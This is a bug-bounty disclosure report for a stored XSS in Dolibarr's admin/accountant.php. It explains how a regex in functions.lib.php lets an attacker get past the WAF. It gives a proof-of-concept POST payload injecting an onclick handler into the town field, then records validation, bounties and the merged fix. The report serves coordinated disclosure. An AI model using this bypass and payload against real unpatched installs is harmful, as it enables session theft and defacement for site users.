A stored XSS in dolibarr/htdocs/admin/accountant.php in dolibarr/dolibarr

Valid

Reported on

Jun 12th 2022


Description

I found a stored XSS in the admin/accountant.php, the field town, name, Accountant code can escape the double quote. In the path 'dolibarr/htdocs/main.inc.php' has a WAF, we can not inject any the javascript onxxx event. However, in the path dolibarr/htdocs/core/lib/functions.lib.php(line 6643), there is a statement:

$temp = preg_replace('/<+([a-z]+)/i', '\1', $temp);

We can use it to bypass the WAF by adding a < in the payload.

Proof of Concept

POST /dolibarr/htdocs/admin/accountant.php HTTP/1.1
...
...&town="on<click=alert(/xss/);"

The PoC Video

Impact

This vulnerability has the potential to deface websites, result in compromised user accounts, and can run malicious code on web pages, which can lead to a compromise of the user’s device.

We are processing your report and will contact the dolibarr team within 24 hours. 14 days ago
i0hex modified the report
14 days ago
We have contacted a member of the dolibarr team and are waiting to hear back 13 days ago
i0hex modified the report
13 days ago
Laurent Destailleur validated this vulnerability 13 days ago
i0hex has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Laurent Destailleur confirmed that a fix has been merged on 2b5b99 13 days ago
Laurent Destailleur has been awarded the fix bounty
to join this conversation